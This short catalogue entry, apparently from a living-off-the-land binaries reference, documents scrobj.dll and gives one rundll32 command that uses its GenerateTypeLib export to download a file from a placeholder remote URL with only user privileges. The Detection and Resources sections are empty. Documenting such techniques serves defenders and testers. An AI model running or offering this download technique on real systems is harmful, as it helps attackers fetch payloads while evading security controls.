Scrobj.dll

Windows Script Component Runtime

Paths

  • c:\windows\system32\scrobj.dll
  • c:\windows\syswow64\scrobj.dll

Commands

Download

Once executed, scrobj.dll attempts to load a file from the URL and saves it to INetCache.

Use case: Download file from remote location.

Privileges: User

rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib {REMOTEURL:.exe}

Detection

Resources